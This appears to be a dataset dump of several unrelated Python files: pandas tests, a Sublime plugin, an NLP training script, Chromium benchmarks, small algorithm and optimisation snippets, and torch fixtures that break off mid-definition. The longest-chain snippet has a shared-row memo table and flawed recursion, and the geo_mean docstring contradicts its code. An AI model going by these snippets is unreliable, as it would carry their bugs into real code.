if tz == "Asia/Kolkata" and pf.freq_shortest(freq, "H") == "H" and not floating:
# Kolkata and Berlin timezone only share 15T-boundaries. Therefore, any other
# frequency should raise an error.
must_raise = True
# remove timestamp from index.
if removesome == 1: # remove one from end or start
i = i.delete(np.random.choice([0, len(i) - 1]))
elif removesome == 2: # remove max 3 from middle
i = i.delete(np.random.randint(2, len(i) - 2, 3))
must_raise = True
# Add values.
if series_or_df == "series":
fr = dev.get_series(i)
else:
fr = dev.get_dataframe(i)
# See if error is raised.
if freq not in pf.FREQUENCIES or must_raise:
with pytest.raises(ValueError):
_ = frames.standardize(fr, "aware", bound, floating=floating)
return
result = frames.standardize(fr, "aware", bound, floating=floating)
assert result.index.freq == freq
@pytest.mark.parametrize(
("values", "maxgap", "gapvalues"),
[
([1, 2, 3, 4, 25, 7, 8], 1, []),
([1, 2, 3, 4, nan, 7, 8], 1, [5.5]),
([1, 2, 3, 4, nan, 7, 8], 2, [5.5]),
([1, 2, 3, 4, nan, 7, 8], 3, [5.5]),
([3, 2, 1, nan, nan, 7, 8], 1, [nan, nan]),
([3, 2, 1, nan, nan, 7, 8], 2, [3, 5]),
([3, 2, 1, nan, nan, 7, 8], 3, [3, 5]),
([nan, 2, 1, nan, nan, 7, nan], 1, [nan, nan, nan, nan]),
([nan, 2, 1, nan, nan, 7, nan], 2, [nan, 3, 5, nan]),
],
)
@pytest.mark.parametrize(
("index", "tol"),
[
(range(7), 0),
(range(-3, 4), 0),
(pd.date_range("2020", periods=7, freq="D"), 0),
(pd.date_range("2020", periods=7, freq="M", tz="Europe/Berlin"), 0.04),
],
)
def test_fill_gaps(values, index, maxgap, gapvalues, tol):
"""Test if gaps are correctly interpolated."""
# Test as Series.
s = pd.Series(values, index)
s_new = frames.fill_gaps(s, maxgap)
s[s.isna()] = gapvalues
pd.testing.assert_series_equal(s_new, s, rtol=tol)
# Test as DataFrame.
df = pd.DataFrame({"a": values}, index)
df_new = frames.fill_gaps(df, maxgap)
df[df.isna()] = gapvalues
pd.testing.assert_frame_equal(df_new, df, rtol=tol)
@pytest.mark.parametrize(
("df_columns", "header", "expected_columns"),
[
(["A"], "B", [("B", "A")]),
(["A1", "A2"], "B", [("B", "A1"), ("B", "A2")]),
(pd.MultiIndex.from_tuples([("B", "A")]), "C", [("C", "B", "A")]),
(
pd.MultiIndex.from_product([["B"], ["A1", "A2"]]),
"C",
[("C", "B", "A1"), ("C", "B", "A2")],
),
(
pd.MultiIndex.from_tuples([("B1", "A1"), ("B2", "A2")]),
"C",
[("C", "B1", "A1"), ("C", "B2", "A2")],
),
],
)
def test_addheader_tocolumns(df_columns, header, expected_columns):
"""Test if header can be added to the columns of a dataframe."""
i = dev.get_index()
df_in = pd.DataFrame(np.random.rand(len(i), len(df_columns)), i, df_columns)
result_columns = frames.add_header(df_in, header).columns.to_list()
assert np.array_equal(result_columns, expected_columns)
# TODO: put in ... fixture (?)
test_index_D = dev.get_index("D")
test_index_D_deconstructed = test_index_D.map(lambda ts: (ts.year, ts.month, ts.day))
test_index_H = dev.get_index("H")
test_index_H_deconstructed = test_index_H.map(lambda ts: (ts.year, ts.month, ts.day))
@pytest.mark.parametrize(
("df_index", "header", "expected_index"),
[
(test_index_D, "test", [("test", i) for i in test_index_D]),
(
test_index_D_deconstructed,
"test",
[("test", *i) for i in test_index_D_deconstructed],
),
(test_index_H, "test", [("test", i) for i in test_index_H]),
(
test_index_H_deconstructed,
"test",
[("test", *i) for i in test_index_H_deconstructed],
),
],
)
def test_addheader_torows(df_index, header, expected_index):
"""Test if header can be added to the rows of a dataframe."""
df_in = pd.DataFrame(np.random.rand(len(df_index), 2), df_index, ["A", "B"])
result_index = frames.add_header(df_in, header, axis=0).index.to_list()
assert np.array_equal(result_index, expected_index)
# TODO: put in ... fixture (?)
test_values = np.random.rand(len(test_index_D), 10)
test_df_1 = pd.DataFrame(test_values[:, :2], test_index_D, ["A", "B"])
test_df_2 = pd.DataFrame(test_values[:, 2], test_index_D, ["C"])
expect_concat_12 = pd.DataFrame(test_values[:, :3], test_index_D, ["A", "B", "C"])
test_df_3 = pd.DataFrame(test_values[:, 2], test_index_D, pd.Index([("D", "C")]))
expect_concat_13 = pd.DataFrame(
test_values[:, :3], test_index_D, pd.Index([("A", ""), ("B", ""), ("D", "C")])
)
@pytest.mark.parametrize(
("dfs", "axis", "expected"),
[
([test_df_1, test_df_2], 1, expect_concat_12),
([test_df_1, test_df_3], 1, expect_concat_13),
],
)
def test_concat(dfs, axis, expected):
"""Test if concatenation works as expected."""
result = frames.concat(dfs, axis)
testing.assert_frame_equal(result, expected)
@pytest.mark.parametrize("weightsas", ["none", "list", "series"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasseries1(weightsas, axis):
"""Test if weighted average of a series is correctly calculated."""
values = pd.Series([100, 200, 300, -150])
weights = [10, 10, 10, 20]
if weightsas == "none":
weights = None
expected_result = 112.5
elif weightsas == "list":
expected_result = 60
elif weightsas == "series":
weights = pd.Series(weights, index=[3, 2, 1, 0]) # align by index
expected_result = 110
assert np.isclose(frames.wavg(values, weights, axis), expected_result)
@pytest.mark.parametrize("weightsas", ["list", "series"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasseries2(weightsas, axis):
"""Test if weighted average of a series is correctly calculated."""
values = pd.Series([100, 200, 300, -150])
weights = [10, 0, 10, 20]
if weightsas == "list":
expected_result = 25
elif weightsas == "series":
weights = pd.Series(weights, index=[3, 2, 1, 0]) # align by index
expected_result = 62.5
assert np.isclose(frames.wavg(values, weights, axis), expected_result)
@pytest.mark.parametrize("weightsas", ["list", "series"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasseries_na(weightsas, axis):
"""Test if weighted average of a series is correctly identified as error,
when all weights are 0 but not all values are equal."""
values = pd.Series([100, 200, 300, -150])
weights = [0, 0, 0, 0]
if weightsas == "series":
weights = pd.Series(weights, index=[3, 2, 1, 0]) # align by index
assert np.isnan(frames.wavg(values, weights, axis))
@pytest.mark.parametrize("weightsas", ["list", "series"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasseries_0weights(weightsas, axis):
"""Test if weighted average of a series is correctly calculated,
when all weights are 0 and all values are equal."""
values = pd.Series([100, 100, 100, 100])
weights = [0, 0, 0, 0]
if weightsas == "series":
weights = pd.Series(weights, index=[3, 2, 1, 0]) # align by index
assert frames.wavg(values, weights, axis) == 100
@pytest.mark.parametrize("weightsas", ["none", "list", "series", "dataframe"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasdataframe1(weightsas, axis):
"""Test if weighted average of a dataframe is correctly calculated."""
values = pd.DataFrame({"a": [100, 200, 300, -150], "b": [100, -200, 300, -150]})
if weightsas == "none":
weights = None
if axis == 0:
expected_result = pd.Series({"a": 112.5, "b": 12.5})
else:
expected_result = pd.Series([100, 0, 300, -150])
if weightsas == "list":
if axis == 0:
weights = [10, 10, 10, 20]
expected_result = pd.Series({"a": 60, "b": -20})
else:
weights = [10, 30]
expected_result = pd.Series([100, -100, 300, -150])
if weightsas == "series":
if axis == 0:
weights = pd.Series([10, 10, 10, 20], index=[3, 2, 1, 0])
expected_result = pd.Series({"a": 110, "b": 30})
else:
weights = pd.Series({"b": 30, "a": 10})
expected_result = pd.Series([100, -100, 300, -150])
if weightsas == "dataframe":
weights = pd.DataFrame({"a": [10, 10, 10, 20], "b": [10, 10, 30, 0]})
if axis == 0:
expected_result = pd.Series({"a": 60, "b": 160})
else:
expected_result = pd.Series([100, 0, 300, -150])
pd.testing.assert_series_equal(
frames.wavg(values, weights, axis), expected_result, check_dtype=False
)
@pytest.mark.parametrize("weightsas", ["list", "series", "dataframe"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasdataframe2(weightsas, axis):
"""Test if weighted average of a dataframe is correctly calculated."""
values = pd.DataFrame({"a": [100, 200, 200, -150], "b": [100, -200, 300, -150]})
if weightsas == "list":
if axis == 0:
weights = [10, 10, 0, 20]
expected_result = pd.Series({"a": 0, "b": -100})
else:
weights = [10, 0]
expected_result = pd.Series([100, 200, 200, -150])
if weightsas == "series":
if axis == 0:
weights = pd.Series([10, 10, 0, 20], index=[3, 2, 1, 0])
expected_result = pd.Series({"a": 62.5, "b": 87.5})
else:
weights = pd.Series({"b": 0, "a": 10})
expected_result = pd.Series([100, 200, 200, -150])
if weightsas == "dataframe":
weights = pd.DataFrame({"a": [10, 10, 0, 20], "b": [10, 10, 30, 0]})
if axis == 0:
expected_result = pd.Series({"a": 0, "b": 160})
else:
expected_result = pd.Series([100, 0, 300, -150])
pd.testing.assert_series_equal(
frames.wavg(values, weights, axis), expected_result, check_dtype=False
)
@pytest.mark.parametrize("weightsas", ["list", "series", "dataframe"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasdataframe_na(weightsas, axis):
"""Test if weighted average of a dataframe is correctly is correctly identified as error,
when all weights are 0 but not all values are equal."""
values = pd.DataFrame({"a": [130, 200, 200, -160], "b": [100, -200, 300, -150]})
if axis == 0:
weights = [0, 0, 0, 0]
expected_result = pd.Series({"a": np.nan, "b": np.nan})
else:
weights = [0, 0]
expected_result = pd.Series([np.nan, np.nan, np.nan, np.nan])
if weightsas == "series":
if axis == 0:
weights = pd.Series(weights, index=[3, 2, 1, 0])
else:
weights = pd.Series(weights, index=["a", "b"])
if weightsas == "dataframe":
weights = pd.DataFrame({"a": [0, 0, 0, 0], "b": [0, 0, 0, 0]})
pd.testing.assert_series_equal(
frames.wavg(values, weights, axis), expected_result, check_dtype=False
)
@pytest.mark.parametrize("weightsas", ["list", "series", "dataframe"])
@pytest.mark.parametrize("axis", [0, 1])
def test_wavg_valuesasdataframe_0weights(weightsas, axis):
"""Test if weighted average of a dataframe is correctly is correctly identified as error,
when all weights are 0. Some averages are calculated from identical values and should
result in that value."""
values = pd.DataFrame({"a": [100, 200, 200, -150], "b": [100, -200, 300, -150]})
if axis == 0:
weights = [0, 0, 0, 0]
expected_result = pd.Series({"a": np.nan, "b": np.nan})
else:
weights = [0, 0]
expected_result = pd.Series([100, np.nan, np.nan, -150])
if weightsas == "series":
if axis == 0:
weights = pd.Series(weights, index=[3, 2, 1, 0])
else:
weights = pd.Series(weights, index=["a", "b"])
if weightsas == "dataframe":
weights = pd.DataFrame({"a": [0, 0, 0, 0], "b": [0, 0, 0, 0]})
pd.testing.assert_series_equal(
frames.wavg(values, weights, axis), expected_result, check_dtype=False
)
vals1 = np.array([1, 2.0, -4.1234, 0])
vals2 = np.array([1, 2.0, -4.1234, 0.5])
@pytest.mark.parametrize(
("s1", "s2", "expected_result"),
[
(pd.Series(vals1), pd.Series(vals1), True),
(pd.Series(vals1), pd.Series(vals2), False),
(pd.Series(vals1), pd.Series(vals1, dtype="pint[MW]"), False),
(pd.Series(vals1).astype("pint[MW]"), pd.Series(vals1, dtype="pint[MW]"), True),
(
pd.Series(vals1 * 1000).astype("pint[kW]"),
pd.Series(vals1, dtype="pint[MW]"),
True,
),
(
pd.Series(vals1 * 1000).astype("pint[MW]"),
pd.Series(vals1, dtype="pint[MW]"),
False,
),
],
)
def test_series_allclose(s1, s2, expected_result):
"""Test if series can be correctly compared, even if they have a unit."""
assert frames.series_allclose(s1, s2) == expected_result
|
python
|
import sublime
from ui.read import settings as read_settings
from ui.write import write, highlight as write_highlight
from lookup import file_type as lookup_file_type
from ui.read import x as ui_read
from ui.read import spots as read_spots
from ui.read import regions as ui_regions
from core.read import read as core_read
from structs.general_thread import *
from structs.thread_handler import *
from structs.highlight_list import *
from structs.flag_region import *
from core.analyse import analyse
def flags():
return [
FlagRegion('bolt.incorrect', 'comment', 'light_x', 0),
FlagRegion('bolt.missing', 'string', 'arrow_right', 0),
FlagRegion('bolt.unused', 'comment', 'dot', sublime.DRAW_OUTLINED),
FlagRegion('bolt.wrong_module', 'comment', 'light_x', 0)
]
def highlight_setting():
return 'bolt.live.highlight'
def rate_setting():
return 'bolt.live.highlight.rate'
def is_enabled():
settings = read_settings.load_settings()
return settings.get(highlight_setting(), False)
def get_rate():
settings = read_settings.load_settings()
return settings.get(rate_setting(), 1000)
def set_enabled(state):
settings = read_settings.load_settings()
settings.set(highlight_setting(), state)
write.save_settings()
def toggle(view):
def noop(v):
return True
handler = ThreadHandler(noop, noop, noop)
prev = is_enabled()
current = not prev
if (current):
run(view, handler)
else:
clear(view)
set_enabled(current)
def run(view, handler):
valid = lookup_file_type.is_bolt_module(view)
if not valid:
open_file = view.file_name() if view.file_name() != None else '-- no view'
print 'View is not a bolt module: ' + open_file
handler.cancel()
else:
read_view = ui_read.all(view)
spots = read_spots.spots(view)
plasmas = core_read.plasmas(read_view.ptext)
def update_ui(highlights, module_wrong):
def run():
regions = write_highlight.regions(view, highlights)
module_region = [ui_regions.module_name(view)] if module_wrong else []
flag_info = zip(flags(), [regions.incorrect, regions.missing, regions.unused, module_region])
def highlight_flag(x):
if len(x[1]) > 0:
write_highlight.highlight(view, x[1], x[0]),
else:
write_highlight.remove_highlight(view, x[0])
map(highlight_flag, flag_info)
sublime.set_timeout(run, 0)
thread = GeneralThread(_highlighter(read_view, spots, plasmas, update_ui), handler.success, handler.failure)
sublime.set_timeout(thread.start, 0)
handler.init(thread)
def clear(view):
def run():
write_highlight.remove_highlights(view, flags())
sublime.set_timeout(run, 0)
def _highlighter(read_view, spots, plasmas, callback):
def r():
try:
highlights = analyse.all(read_view.base, read_view.nests, plasmas, spots, read_view.external)
module_wrong = analyse.module_wrong(read_view)
callback(highlights, module_wrong)
except Exception as exc:
print "Error during identifying highlighted regions: " + str(exc)
traceback.print_exc(limit=10)
callback(HighlightLists([], [], []), False)
return r
|
python
|
import random, time, torch
import numpy as np
from nlplingo.oregon.event_models.uoregon.define_opt import opt
from nlplingo.oregon.event_models.uoregon.tools.utils import *
from nlplingo.oregon.event_models.uoregon.models.pipeline._01.readers import read_abstract_train_data
from nlplingo.oregon.event_models.uoregon.models.pipeline._01.trainers import *
opt['train_on_arb'] = 1
opt['train_strategy'] = 'retrain.add-all'
opt['initialize_with_pretrained'] = 1
opt['finetune_on_arb'] = 1
opt['observed_train'] = 'datasets/8d/update2/arabic-wa-corpus.bp.json'
opt['dev_file'] = 'datasets/8d/update2/arabic-abstract-sample.bp.json'
assert opt['co_train_lambda'] == 0
assert opt['input_lang'] == 'arabic'
""" opt:
ED_eval_epoch : 0
argument_eval_epoch : 0
bad_threshold : 0.4
batch_size : 16
biw2v_map_dir : resources/aligned_w2v
biw2v_size : 354186
biw2v_vecs : [[ 0.00000000e+00 0.00000000e+00 0.00000000e+00 ... 0.00000000e+00
0.00000000e+00 0.00000000e+00]
[ 8.26119033e-01 3.68800311e-01 8.69561242e-01 ... 2.70505650e-01
2.05427664e-01 2.01526267e-01]
[ 1.33400000e-03 1.47300000e-03 -1.27700000e-03 ... -4.37000000e-04
-5.52000000e-04 1.02400000e-03]
...
[-1.15833000e-01 -8.17270000e-02 -5.58370000e-02 ... -1.59482000e-01
-3.43660000e-02 6.65400000e-03]
[-3.82970000e-02 -5.19210000e-02 -7.23600000e-02 ... -1.40313000e-01
1.73640000e-02 1.28790000e-02]
[-1.11085000e-01 -4.86380000e-02 -8.37620000e-02 ... -1.55592000e-01
6.28500000e-03 3.66210000e-02]]
ckpt_dir : checkpoints
co_train_lambda : 0
context_layer : lstm
cross_valid :
data : abstract
data_map : None
datapoint_dir : datapoints
delete_nonbest_ckpts : 1
deprel_dim : 30
dev_file : datasets/8d/update2/arabic-abstract-sample.bp.json
device : cuda
dist_dim : 30
do_exp : default
docker_run : 0
dropout_xlmr : 0.1
edge_lambda : 0.1
ensemble_mode : 0
ensemble_seeds : ['seed-2021', 'seed-2022', 'seed-2023', 'seed-2024', 'seed-2025']
finetune_biw2v : 0
finetune_on_arb : 1
finetune_xlmr : 1
finetuned_xlmr_layers : ['xlmr_embedding.model.decoder.sentence_encoder.embed_tokens',
'xlmr_embedding.model.decoder.sentence_encoder.embed_positions', 'self_att.attention_layers', 'gcn_layer',
'biw2v_embedding', 'xlmr_embedding.model.decoder.sentence_encoder.layers.0.',
'xlmr_embedding.model.decoder.sentence_encoder.layers.1.',
'xlmr_embedding.model.decoder.sentence_encoder.layers.2.',
'xlmr_embedding.model.decoder.sentence_encoder.layers.3.']
gcn_dropout : 0.5
get_perf_of_separate_models : 0
grad_clip_xlmr : 0
hidden_dim : 200
hidden_eval : 0
inhouse_eval : 0
initialize_with_pretrained : 1
input_lang : arabic
lambda_mix : 0.8
log_dir : logs
log_name : train.log.arg.arabic-wa-corpus
lr : 2e-05
lstm_add_satt : 0
lstm_by_satt : 0
lstm_layers_entity : 1
lstm_layers_event : 1
lstm_layers_trigger : 4
max_grad_norm : 5.0
mode : None
model : pipeline-01
ner_dim : 30
num_epoch : 10
num_first_xlmr_layers : 5
num_last_layer_xlmr : 1
observed_train : datasets/8d/update2/arabic-wa-corpus.bp.json
optim : adam
output_file : None
output_format : json
output_offsets : 1
params : None
position_embed_for_satt : 1
prune_tree : 0
readers_mode : 1
remove_incomplete : 0
save_last_epoch : 1
seed : 2020
self_att_d_qkv : 200
self_att_dropout : 0.1
self_att_heads : 1
self_att_layers : 6
stanford_resource_dir : resources/stanford
test_file : None
test_is_dir : False
train_ED : 0
train_argument : 1
train_file : app/train_data.bp.json
train_is_dir : True
train_on_arb : 1
train_strategy : retrain.add-all
trainer : trigger
upos_dim : 30
use_biw2v : 0
use_cased_entity : 1
use_dep2sent : 0
use_dep_edge : 0
use_elmo : 0
use_ner : 0
xlmr_model_dir : models/xlmr.base
xlmr_version : xlmr.base
xpos_dim : 30
"""
data_map = read_abstract_train_data(opt['observed_train'], opt['dev_file'])
opt['data_map'] = data_map
# ************* ED model *****************
if opt['train_ED']:
torch.autograd.set_detect_anomaly(True)
random.seed(opt['seed'])
np.random.seed(opt['seed'])
torch.manual_seed(opt['seed'])
torch.cuda.manual_seed(opt['seed'])
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
ED_trainer = EDTrainer(opt)
if opt['get_perf_of_separate_models']:
ED_trainer.eval_with_saved_model()
else:
ED_trainer.train()
# ************* argument model *****************
if opt['train_argument']:
torch.autograd.set_detect_anomaly(True)
random.seed(opt['seed'])
np.random.seed(opt['seed'])
torch.manual_seed(opt['seed'])
torch.cuda.manual_seed(opt['seed'])
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
arg_trainer = ArgumentTrainer(opt)
if opt['get_perf_of_separate_models']:
arg_trainer.eval_with_saved_model()
else:
arg_trainer.train()
if not opt['get_perf_of_separate_models']:
print('Training done!')
|
python
|
from dbnd._core.cli.click_utils import _help
from dbnd._core.cli.service_auto_completer import completer
from dbnd._core.task_build.task_registry import get_task_registry
from dbnd._vendor import click
@click.command()
@click.argument("search", default="", autocompletion=completer.config())
@click.option("--module", "-m", help="Used for dynamic loading of modules")
@click.pass_context
def show_configs(ctx, module, search):
"""Show and search configurations"""
_list_tasks(ctx, module, search, is_config=True)
@click.command()
@click.argument("search", default="", autocompletion=completer.task())
@click.option("--module", "-m", help="Used for dynamic loading of modules")
@click.pass_context
def show_tasks(ctx, module, search):
"""Show and search tasks"""
_list_tasks(ctx, module, search, is_config=False)
COMMON_PARAMS = {"task_version", "task_env", "task_target_date"}
def _list_tasks(ctx, module, search, is_config):
from dbnd import Config
from dbnd._core.parameter.parameter_definition import _ParameterKind
from dbnd._core.context.databand_context import new_dbnd_context
formatter = ctx.make_formatter()
with new_dbnd_context(module=module):
tasks = get_task_registry().list_dbnd_task_classes()
for task_cls in tasks:
td = task_cls.task_definition
full_task_family = td.full_task_family
task_family = td.task_family
if not (task_family.startswith(search) or full_task_family.startswith(search)):
continue
if issubclass(task_cls, Config) != is_config:
continue
dl = []
for param_name, param_obj in td.task_param_defs.items():
if param_obj.system or param_obj.kind == _ParameterKind.task_output:
continue
if not is_config and param_name in COMMON_PARAMS:
continue
param_help = _help(param_obj.description)
dl.append((param_name, param_help))
if dl:
with formatter.section(
"{task_family} ({full_task_family})".format(
full_task_family=full_task_family, task_family=task_family
)
):
formatter.write_dl(dl)
click.echo(formatter.getvalue().rstrip("\n"))
|
python
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The page cycler v2.
For details, see design doc:
https://docs.google.com/document/d/1EZQX-x3eEphXupiX-Hq7T4Afju5_sIdxPWYetj7ynd0
"""
from core import perf_benchmark
import page_sets
from benchmarks import loading_metrics_category
from telemetry import benchmark
from telemetry.page import cache_temperature
from telemetry.web_perf import timeline_based_measurement
class _PageCyclerV2(perf_benchmark.PerfBenchmark):
options = {'pageset_repeat': 2}
def CreateCoreTimelineBasedMeasurementOptions(self):
tbm_options = timeline_based_measurement.Options()
loading_metrics_category.AugmentOptionsForLoadingMetrics(tbm_options)
return tbm_options
@classmethod
def ShouldDisable(cls, possible_browser):
# crbug.com/619254
if possible_browser.browser_type == 'reference':
return True
# crbug.com/616781
if (cls.IsSvelte(possible_browser) or
possible_browser.platform.GetDeviceTypeName() == 'Nexus 5X' or
possible_browser.platform.GetDeviceTypeName() == 'AOSP on BullHead'):
return True
return False
@benchmark.Disabled('win10')
@benchmark.Disabled('android') # crbug.com/654217
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2Typical25(_PageCyclerV2):
"""Page load time benchmark for a 25 typical web pages.
Designed to represent typical, not highly optimized or highly popular web
sites. Runs against pages recorded in June, 2014.
"""
@classmethod
def Name(cls):
return 'page_cycler_v2.typical_25'
def CreateStorySet(self, options):
return page_sets.Typical25PageSet(run_no_page_interactions=True,
cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.Typical25StoryExpectations()
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2IntlArFaHe(_PageCyclerV2):
"""Page load time for a variety of pages in Arabic, Farsi and Hebrew.
Runs against pages recorded in April, 2013.
"""
page_set = page_sets.IntlArFaHePageSet
@classmethod
def Name(cls):
return 'page_cycler_v2.intl_ar_fa_he'
def CreateStorySet(self, options):
return page_sets.IntlArFaHePageSet(cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.IntlArFaHeStoryExpectations()
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2IntlEsFrPtBr(_PageCyclerV2):
"""Page load time for a pages in Spanish, French and Brazilian Portuguese.
Runs against pages recorded in April, 2013.
"""
page_set = page_sets.IntlEsFrPtBrPageSet
@classmethod
def Name(cls):
return 'page_cycler_v2.intl_es_fr_pt-BR'
def CreateStorySet(self, options):
return page_sets.IntlEsFrPtBrPageSet(cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.IntlEsFrPtBrStoryExpectations()
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2IntlHiRu(_PageCyclerV2):
"""Page load time benchmark for a variety of pages in Hindi and Russian.
Runs against pages recorded in April, 2013.
"""
page_set = page_sets.IntlHiRuPageSet
@classmethod
def Name(cls):
return 'page_cycler_v2.intl_hi_ru'
def CreateStorySet(self, options):
return page_sets.IntlHiRuPageSet(cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.IntlHiRuStoryExpectations()
@benchmark.Disabled('android') # crbug.com/666898
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2IntlJaZh(_PageCyclerV2):
"""Page load time benchmark for a variety of pages in Japanese and Chinese.
Runs against pages recorded in April, 2013.
"""
@classmethod
def Name(cls):
return 'page_cycler_v2.intl_ja_zh'
def CreateStorySet(self, options):
return page_sets.IntlJaZhPageSet(cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.IntlJaZhStoryExpectations()
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2IntlKoThVi(_PageCyclerV2):
"""Page load time for a variety of pages in Korean, Thai and Vietnamese.
Runs against pages recorded in April, 2013.
"""
page_set = page_sets.IntlKoThViPageSet
@classmethod
def Name(cls):
return 'page_cycler_v2.intl_ko_th_vi'
def CreateStorySet(self, options):
return page_sets.IntlKoThViPageSet(cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.IntlKoThViStoryExpectations()
@benchmark.Enabled('android')
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2Top10Mobile(_PageCyclerV2):
"""Page load time benchmark for the top 10 mobile web pages.
Runs against pages recorded in November, 2013.
"""
@classmethod
def Name(cls):
return 'page_cycler_v2.top_10_mobile'
def CreateStorySet(self, options):
return page_sets.Top10MobilePageSet(cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.Top10MobileStoryExpectations()
|
python
|
from typing import List
from machine.params import Parameters
from machine.plugin import Plugin
from machine.connection import Connection
from machine.plugin import PluginGenerator, PluginResult
class Sequence(Plugin):
def __init__(self, plugins: List[PluginGenerator]):
assert len(plugins) > 0, "Sequence cannot be empty!"
self._plugins = plugins
async def __call__(
self, conn: Connection, params: Parameters
) -> PluginResult:
applied_plugins: List[PluginResult] = []
try:
for plugin_gen in self._plugins:
plugin = plugin_gen()(conn, params)
conn, params = await plugin.__anext__()
applied_plugins.append(plugin)
yield conn, params
for plugin in reversed(applied_plugins):
try:
await plugin.__anext__()
except StopAsyncIteration:
continue
return
except Exception as exception:
error = exception
while len(applied_plugins) > 0:
try:
plugin = applied_plugins.pop(-1)
await plugin.athrow(error)
break
except Exception as e:
error = e
def sequence(plugins: List[PluginGenerator]) -> PluginGenerator:
return lambda: Sequence(plugins)
|
python
|
# You are given N pairs of numbers.
# In every pair, the first number is always smaller than the second number.
# A pair (c, d) can follow another pair (a, b) if b < c.
# Chain of pairs can be formed in this fashion.
# You have to find the longest chain which can be formed from the given set of pairs.
dp = [[0]*100]*100
def maxchain(Parr, n, prev, pos):
if pos >= n:
return 0
if dp[pos][prev]:
return dp[pos][prev]
if Parr[pos][0] < prev:
return maxchain(Parr, n, prev, pos+1)
else:
ans = max(maxchain(Parr, n, Parr[pos][1],
0)+1, maxchain(Parr, n, prev, pos+1))
dp[pos][prev] = ans
return ans
print(maxchain([[1, 2], [2, 3], [3, 4]], 3, 0, 0))
def findLongestChain(pairs):
pairs.sort()
dp = [1] * len(pairs)
for j in range(len(pairs)):
for i in range(j):
if pairs[i][1] < pairs[j][0]:
dp[j] = max(dp[j], dp[i] + 1)
return max(dp)
|
python
|
""" This is the geo_mean atom.
geo_mean(x,y) = sqrt(x * y)
If either x or y is a vector, the atom is applied elementwise.
It is a CONCAVE atom. It is DECREASING in the first argument, and
DECREASING in the second argument.
It returns a SCALAR expression if the both arguments are SCALAR.
Otherwise, it returns a VECTOR expression (sized to match the largest
arugment).
In every module, you must have defined two functions:
attributes :: [arg] -> (sign, vexity, shape)
rewrite :: [arg] -> Program
"""
import atom
from utils import *
class QC_geo_mean(atom.Atom):
def __init__(self, x, y):
super(QC_geo_mean, self).__init__(x,y)
def _monotonicity(self):
return [monotonicity.increasing, monotonicity.increasing]
def _curvature(self):
return curvature.Concave()
def _sign(self):
return sign.Positive()
def _shape(self):
return self.args[0].shape + self.args[1].shape
def _canonicalize(self):
v = Variable('', self.shape)
x, y = self.args
constraints = [
SOCProd(x + y, [y - x, Number(2.0)*v]),
y >= Number(0),
x >= Number(0)
]
return (v, constraints)
# register with the atom library
atom.atoms['geo_mean'] = QC_geo_mean
|
python
|
import torch
__TESTS__ = { }
def get_tests():
for k, v in __TESTS__.items():
yield k, v
def register(test):
name = getattr(test, "__name__", test.__class__.__name__)
if name in __TESTS__:
raise RuntimeError(f'Encountered a test name collision "{name}"')
__TESTS__[name] = test
return test
@register
def test1():
unaligned = torch.Tensor([
[-0.9743, -0.2491],
[-0.5582, -0.1589],
[-0.2159, -0.1677],
[ 0.1593, -0.3002],
[-0.9743, 0.2714],
[-0.5582, 0.1491],
[-0.2159, 0.1377],
[ 0.1593, 0.2662]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
@register
def test2():
unaligned = torch.Tensor([
[-0.9791, -0.3541],
[-0.5517, -0.1809],
[-0.2686, -0.1822],
[ 0.2237, -0.4052],
[-0.9791, 0.2998],
[-0.5517, 0.1574],
[-0.2686, 0.1590],
[ 0.2237, 0.3572]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
@register
def test3():
unaligned = torch.Tensor([
[-0.9882, -0.0736],
[-0.7437, -0.0662],
[-0.2522, -0.0995],
[ 0.2172, -0.1664],
[-0.9882, 0.2589],
[-0.7437, 0.1070],
[-0.2522, 0.1835],
[ 0.2172, 0.2766]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
@register
def test4():
unaligned = torch.Tensor([
[-0.9846, -0.5418],
[ 0.0205, -0.2194],
[ 0.2252, -0.2062],
[ 0.5488, -0.2653],
[-0.9846, 0.4780],
[ 0.0205, 0.2186],
[ 0.2252, 0.1963],
[ 0.5488, 0.1743]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
@register
def test5():
unaligned = torch.Tensor([
[-0.9825, -0.1939],
[-0.7482, -0.1596],
[-0.1407, -0.2930],
[ 0.2218, -0.4294],
[-0.9825, 0.1199],
[-0.7482, 0.1063],
[-0.1407, 0.1077],
[ 0.2218, 0.1338]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
@register
def test6():
